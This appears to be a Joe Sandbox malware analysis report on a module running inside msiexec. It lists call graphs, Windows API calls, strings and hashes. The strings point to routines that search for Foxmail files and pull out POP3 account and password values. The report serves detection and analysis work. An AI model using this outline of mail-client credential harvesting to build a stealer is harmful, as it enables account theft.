2232260b 7053->7071 7057 22322451 ___scrt_release_startup_lock 7056->7057 7058 22322455 7057->7058 7061 22322461 7057->7061 7059 2232527a _abort 20 API calls 7058->7059 7060 2232245f 7059->7060 7060->7049 7062 2232246e 7061->7062 7063 2232499b _abort 28 API calls 7061->7063 7062->7049 7064 22324bbd 7063->7064 7064->7049 7077 223234c7 RtlInterlockedFlushSList 7065->7077 7067 22322312 7067->7051 7079 2232246f 7068->7079 7070 223220c9 ___scrt_release_startup_lock 7070->7053 7072 22322617 7071->7072 7073 2232262d 7072->7073 7098 223253ed 7072->7098 7073->7055 7076 22323529 ___vcrt_uninitialize 8 API calls 7076->7073 7078 223234d7 7077->7078 7078->7067 7084 223253ff 7079->7084 7082 2232391b ___vcrt_uninitialize_ptd 6 API calls 7083 2232354d 7082->7083 7083->7070 7087 22325c2b 7084->7087 7088 22322476 7087->7088 7089 22325c35 7087->7089 7088->7082 7091 22325db2 7089->7091 7092 22325c45 _abort 5 API calls 7091->7092 7093 22325dd9 7092->7093 7094 22325df1 TlsFree 7093->7094 7095 22325de5 7093->7095 7094->7095 7096 22322ada _ValidateLocalCookies 5 API calls 7095->7096 7097 22325e02 7096->7097 7097->7088 7101 223274da 7098->7101 7103 223274f3 7101->7103 7102 22322ada _ValidateLocalCookies 5 API calls 7104 22322625 7102->7104 7103->7102 7104->7076 7248 22328a89 7251 22326d60 7248->7251 7252 22326d72 7251->7252 7253 22326d69 7251->7253 7255 22326c5f 7253->7255 7256 22325af6 _abort 38 API calls 7255->7256 7257 22326c6c 7256->7257 7258 22326d7e __fassign 38 API calls 7257->7258 7259 22326c74 7258->7259 7275 223269f3 7259->7275 7262 22326c8b 7262->7252 7263 223256d0 21 API calls 7264 22326c9c 7263->7264 7270 22326cce 7264->7270 7282 22326e20 7264->7282 7267 2232571e _free 20 API calls 7267->7262 7268 22326cc9 7269 22326368 _free 20 API calls 7268->7269 7269->7270 7270->7267 7271 22326ce6 7272 22326d12 7271->7272 7273 2232571e _free 20 API calls 7271->7273 7272->7270 7292 223268c9 7272->7292 7273->7272 7276 223254a7 __fassign 38 API calls 7275->7276 7277 22326a05 7276->7277 7278 22326a26 7277->7278 7279 22326a14 GetOEMCP 7277->7279 7280 22326a2b GetACP 7278->7280 7281 22326a3d 7278->7281 7279->7281 7280->7281 7281->7262 7281->7263 7283 223269f3 40 API calls 7282->7283 7284 22326e3f 7283->7284 7287 22326e90 IsValidCodePage 7284->7287 7289 22326e46 7284->7289 7291 22326eb5 ___scrt_fastfail 7284->7291 7285 22322ada _ValidateLocalCookies 5 API calls 7286 22326cc1 7285->7286 7286->7268 7286->7271 7288 22326ea2 GetCPInfo 7287->7288 7287->7289 7288->7289 7288->7291 7289->7285 7295 22326acb GetCPInfo 7291->7295 7368 22326886 7292->7368 7294 223268ed 7294->7270 7300 22326b05 7295->7300 7304 22326baf 7295->7304 7297 22322ada _ValidateLocalCookies 5 API calls 7299 22326c5b 7297->7299 7299->7289 7305 223286e4 7300->7305 7303 22328a3e 43 API calls 7303->7304 7304->7297 7306 223254a7 __fassign 38 API calls 7305->7306 7307 22328704 MultiByteToWideChar 7306->7307 7311 22328742 7307->7311 7316 223287da 7307->7316 7309 22322ada _ValidateLocalCookies 5 API calls 7313 22326b66 7309->7313 7310 22328763 ___scrt_fastfail 7314 223287d4 7310->7314 7317 223287a8 MultiByteToWideChar 7310->7317 7311->7310 7312 223256d0 21 API calls 7311->7312 7312->7310 7319 22328a3e 7313->7319 7324 22328801 7314->7324 7316->7309 7317->7314 7318 223287c4 GetStringTypeW 7317->7318 7318->7314 7320 223254a7 __fassign 38 API calls 7319->7320 7321 22328a51 7320->7321 7328 22328821 7321->7328 7325 2232880d 7324->7325 7327 2232881e 7324->7327 7326 2232571e _free 20 API calls 7325->7326 7325->7327 7326->7327 7327->7316 7329 2232883c 7328->7329 7330 22328862 MultiByteToWideChar 7329->7330 7331 22328a16 7330->7331 7332 2232888c 7330->7332 7333 22322ada _ValidateLocalCookies 5 API calls 7331->7333 7335 223256d0 21 API calls 7332->7335 7338 223288ad 7332->7338 7334 22326b87 7333->7334 7334->7303 7335->7338 7336 223288f6 MultiByteToWideChar 7337 22328962 7336->7337 7339 2232890f 7336->7339 7341 22328801 __freea 20 API calls 7337->7341 7338->7336 7338->7337 7355 22325f19 7339->7355 7341->7331 7343 22328971 7345 223256d0 21 API calls 7343->7345 7349 22328992 7343->7349 7344 22328939 7344->7337 7347 22325f19 11 API calls 7344->7347 7345->7349 7346 22328a07 7348 22328801 __freea 20 API calls 7346->7348 7347->7337 7348->7337 7349->7346 7350 22325f19 11 API calls 7349->7350 7351 223289e6 7350->7351 7351->7346 7352 223289f5 WideCharToMultiByte 7351->7352 7352->7346 7353 22328a35 7352->7353 7354 22328801 __freea 20 API calls 7353->7354 7354->7337 7356 22325c45 _abort 5 API calls 7355->7356 7357 22325f40 7356->7357 7360 22325f49 7357->7360 7363 22325fa1 7357->7363 7361 22322ada _ValidateLocalCookies 5 API calls 7360->7361 7362 22325f9b 7361->7362 7362->7337 7362->7343 7362->7344 7364 22325c45 _abort 5 API calls 7363->7364 7365 22325fc8 7364->7365 7366 22322ada _ValidateLocalCookies 5 API calls 7365->7366 7367 22325f89 LCMapStringW 7366->7367 7367->7360 7369 22326892 ___scrt_is_nonwritable_in_current_image 7368->7369 7376 22325671 RtlEnterCriticalSection 7369->7376 7371 2232689c 7377 223268f1 7371->7377 7375 223268b5 _abort 7375->7294 7376->7371 7389 22327011 7377->7389 7379 2232693f 7380 22327011 26 API calls 7379->7380 7381 2232695b 7380->7381 7382 22327011 26 API calls 7381->7382 7383 22326979 7382->7383 7384 223268a9 7383->7384 7385 2232571e _free 20 API calls 7383->7385 7386 223268bd 7384->7386 7385->7384 7403 223256b9 RtlLeaveCriticalSection 7386->7403 7388 223268c7 7388->7375 7390 22327022 7389->7390 7394 2232701e 7389->7394 7391 22327029 7390->7391 7396 2232703c ___scrt_fastfail 7390->7396 7392 22326368 _free 20 API calls 7391->7392 7393 2232702e 7392->7393 7395 223262ac _abort 26 API calls 7393->7395 7394->7379 7395->7394 7396->7394 7397 2232706a 7396->7397 7398 22327073 7396->7398 7399 22326368 _free 20 API calls 7397->7399 7398->7394 7400 22326368 _free 20 API calls 7398->7400 7401 2232706f 7399->7401 7400->7401 7402 223262ac _abort 26 API calls 7401->7402 7402->7394 7403->7388 7105 2232724e GetProcessHeap 7106 2232284f 7107 22322882 std::exception::exception 27 API calls 7106->7107 7108 2232285d 7107->7108 6397 2232220c 6398 22322215 6397->6398 6399 2232221a dllmain_dispatch 6397->6399 6401 223222b1 6398->6401 6402 223222c7 6401->6402 6404 223222d0 6402->6404 6405 22322264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6402->6405 6404->6399 6405->6404

                                                                                        Executed Functions

                                                                                        Function 223210F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22321137
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321151
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232115C
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232116D
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232117C
                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321193
                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 223211D0
                                                                                        • FindClose.KERNEL32(00000000), ref: 223211DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 1083526818-0
                                                                                        • Opcode ID: 913d7b832080602a54ab7c65e0e48c60407eb4476d373754b11151fd44fa196c
                                                                                        • Instruction ID: 0ce2ffbc3255304a73af21acc42af10b9008428abc821d47d2e7f8408257d917
                                                                                        • Opcode Fuzzy Hash: 913d7b832080602a54ab7c65e0e48c60407eb4476d373754b11151fd44fa196c
                                                                                        • Instruction Fuzzy Hash: E32193725447186BD721EAA49C48F9B7B9CEF84314F000E2AF998D31A0E774DA058796
                                                                                        Function 223212EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22321434
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22321137
                                                                                          • Part of subcall function 223210F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321151
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232115C
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232116D
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232117C
                                                                                          • Part of subcall function 223210F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321193
                                                                                          • Part of subcall function 223210F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 223211D0
                                                                                          • Part of subcall function 223210F1: FindClose.KERNEL32(00000000), ref: 223211DB
                                                                                        • lstrlenW.KERNEL32(?), ref: 223214C5
                                                                                        • lstrlenW.KERNEL32(?), ref: 223214E0
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 2232150F
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 22321521
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 22321547
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 22321553
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 22321579
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 22321585
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 223215AB
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 223215B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                                        • API String ID: 672098462-2938083778
                                                                                        • Opcode ID: e4f739aed99684afe760a93c2e166c7303609c3c3f136bfd1f536b7074173e7f
                                                                                        • Instruction ID: 980541a1e3f2235148527887af7ce7004abbdfc8421002be504383ab4362d435
                                                                                        • Opcode Fuzzy Hash: e4f739aed99684afe760a93c2e166c7303609c3c3f136bfd1f536b7074173e7f
                                                                                        • Instruction Fuzzy Hash: 8581A271A4036CA9EB30DBA0DC85FDE7379EF84710F00469AF508E71A1EAB15E84CB95

                                                                                        Non-executed Functions

                                                                                        Function 223260E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 223261DA
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 223261E4
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 223261F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 68616d68dbd83feb39093bd17bc8efff0f958e806bedf72166b3d6aca32e30f0
                                                                                        • Instruction ID: b83f8994f1d19cec595d7135ea218c2a0b49f60b7c09f9dccfdc86189edfeee1
                                                                                        • Opcode Fuzzy Hash: 68616d68dbd83feb39093bd17bc8efff0f958e806bedf72166b3d6aca32e30f0
                                                                                        • Instruction Fuzzy Hash: 5631B4B495172C9BCB21DF64DD8878DBBB8BF18310F5042DAE81CA6260E7749F858F45
                                                                                        Function 22324AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000,?,22322082,22332108,0000000C,22321F3A,?), ref: 22324AD5
                                                                                        • TerminateProcess.KERNEL32(00000000,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000,?,22322082,22332108,0000000C,22321F3A,?), ref: 22324ADC
                                                                                        • ExitProcess.KERNEL32 ref: 22324AEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: d8bb13a9ad9c8be409d63f3900f31d769aa6269fbe758aa692c85c0c7973d187
                                                                                        • Instruction ID: 0ecbc7d112b50618c3ccc92404ebad0dbc6a68b0259277b4742cf4b19b3c8ef2
                                                                                        • Opcode Fuzzy Hash: d8bb13a9ad9c8be409d63f3900f31d769aa6269fbe758aa692c85c0c7973d187
                                                                                        • Instruction Fuzzy Hash: 6BE04636000B08AFCF026FA4CE08A493F29EF00351B018628FE058B025DB39DD42DA84
                                                                                        Function 22326580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: fe3c814bb1331160d2297af5ad32fced7aa61d41fc0ac575ee338ec7c23ccab0
                                                                                        • Instruction ID: c574d60df370cd1ad2430a8eead9cc35a7eaf26cdd7647010ed8ccee4e2ffde6
                                                                                        • Opcode Fuzzy Hash: fe3c814bb1331160d2297af5ad32fced7aa61d41fc0ac575ee338ec7c23ccab0
                                                                                        • Instruction Fuzzy Hash: 3931F471900709AFCB248E78CD84EEA7BBDDF85314F1043ACE919D7251E6319E458F60
                                                                                        Function 2232724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: 8cbf76a95c663b8df60ee2ef6886c0c582902e5996691df735880cdde28a8ed4
                                                                                        • Instruction ID: 50e5d59b890faf320362255da12a4b393dd6b0856086212e0207cf6dddba028c
                                                                                        • Opcode Fuzzy Hash: 8cbf76a95c663b8df60ee2ef6886c0c582902e5996691df735880cdde28a8ed4
                                                                                        • Instruction Fuzzy Hash: EAA011B02802028F83028E30820A20C3AACBA80280B028A2AEC08C8028EB2C88008A80
                                                                                        Function 2232173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 22321CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D1B
                                                                                          • Part of subcall function 22321CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22321D37
                                                                                          • Part of subcall function 22321CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D4B
                                                                                        • _strlen.LIBCMT ref: 22321855
                                                                                        • _strlen.LIBCMT ref: 22321869
                                                                                        • _strlen.LIBCMT ref: 2232188B
                                                                                        • _strlen.LIBCMT ref: 223218AE
                                                                                        • _strlen.LIBCMT ref: 223218C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen$File$CopyCreateDelete
                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                        • API String ID: 3296212668-3023110444
                                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                        • Instruction ID: 7e7f96fe1cb747581da794990021fb822aa51dc7b61e88586208c7b90d807e87
                                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                        • Instruction Fuzzy Hash: 95610671D00B18ABEF21CBA4CE40BDEB7B9AF15314F104256D284B7262DB745E46CF92
                                                                                        Function 223219B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                                        • API String ID: 4218353326-230879103
                                                                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                        • Instruction ID: 336e7e0ed1208efc831c38b84e068d7810d6460cb34a1b54e8f0ca92fff733ec
                                                                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                        • Instruction Fuzzy Hash: 4C7106B1D00B286BDF219BB49D84ADF7BFCAF19314F104196E644E7242E6749F85CBA0
                                                                                        Function 22327CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 203 22327cc2-22327cd6 204 22327d44-22327d4c 203->204 205 22327cd8-22327cdd 203->205 206 22327d93-22327dab call 22327e35 204->206 207 22327d4e-22327d51 204->207 205->204 208 22327cdf-22327ce4 205->208 215 22327dae-22327db5 206->215 207->206 211 22327d53-22327d90 call 2232571e * 4 207->211 208->204 210 22327ce6-22327ce9 208->210 210->204 213 22327ceb-22327cf3 210->213 211->206 216 22327cf5-22327cf8 213->216 217 22327d0d-22327d15 213->217 219 22327db7-22327dbb 215->219 220 22327dd4-22327dd8 215->220 216->217 221 22327cfa-22327d0c call 2232571e call 223290ba 216->221 222 22327d17-22327d1a 217->222 223 22327d2f-22327d43 call 2232571e * 2 217->223 226 22327dd1 219->226 227 22327dbd-22327dc0 219->227 231 22327df0-22327dfc 220->231 232 22327dda-22327ddf 220->232 221->217 222->223 229 22327d1c-22327d2e call 2232571e call 223291b8 222->229 223->204 226->220 227->226 235 22327dc2-22327dd0 call 2232571e * 2 227->235 229->223 231->215 234 22327dfe-22327e0b call 2232571e 231->234 239 22327de1-22327de4 232->239 240 22327ded 232->240 235->226 239->240 247 22327de6-22327dec call 2232571e 239->247 240->231 247->240
                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 22327D06
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223290D7
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223290E9
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223290FB
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232910D
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232911F
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329131
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329143
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329155
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329167
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329179
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232918B
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232919D
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223291AF
                                                                                        • _free.LIBCMT ref: 22327CFB
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 22327D1D
                                                                                        • _free.LIBCMT ref: 22327D32
                                                                                        • _free.LIBCMT ref: 22327D3D
                                                                                        • _free.LIBCMT ref: 22327D5F
                                                                                        • _free.LIBCMT ref: 22327D72
                                                                                        • _free.LIBCMT ref: 22327D80
                                                                                        • _free.LIBCMT ref: 22327D8B
                                                                                        • _free.LIBCMT ref: 22327DC3
                                                                                        • _free.LIBCMT ref: 22327DCA
                                                                                        • _free.LIBCMT ref: 22327DE7
                                                                                        • _free.LIBCMT ref: 22327DFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0
                                                                                        • Opcode ID: 1deffb4db8af8a7e627a81305fc4ca3f97ab1c5b8892adf51132f0f811d31c2f
                                                                                        • Instruction ID: d62f3b8fb045f300a03e5df9bcdc2b2538231c2cfadb729445174815426fb880
                                                                                        • Opcode Fuzzy Hash: 1deffb4db8af8a7e627a81305fc4ca3f97ab1c5b8892adf51132f0f811d31c2f
                                                                                        • Instruction Fuzzy Hash: 9D313E32600B04DFDB359B39DA50BA6B7E9FF00714F10865AE849D7191DF75AE80CB50
                                                                                        Function 223259D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 223259EA
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 223259F6
                                                                                        • _free.LIBCMT ref: 22325A01
                                                                                        • _free.LIBCMT ref: 22325A0C
                                                                                        • _free.LIBCMT ref: 22325A17
                                                                                        • _free.LIBCMT ref: 22325A22
                                                                                        • _free.LIBCMT ref: 22325A2D
                                                                                        • _free.LIBCMT ref: 22325A38
                                                                                        • _free.LIBCMT ref: 22325A43
                                                                                        • _free.LIBCMT ref: 22325A51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: a587a399a73cebcd1139a0bebbbadeb1e2684c904866e538d5324eeb6803fee6
                                                                                        • Instruction ID: 4df8dfcb50fa330dc6e6c2d8de9b25867b20bac4ec2fec6046994b9b8cbc5f75
                                                                                        • Opcode Fuzzy Hash: a587a399a73cebcd1139a0bebbbadeb1e2684c904866e538d5324eeb6803fee6
                                                                                        • Instruction Fuzzy Hash: CC11A47A560748EFCB29DF58C851CDD3FA5EF14750B1582A1BA088B225DA71DF509B80
                                                                                        Function 2232AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
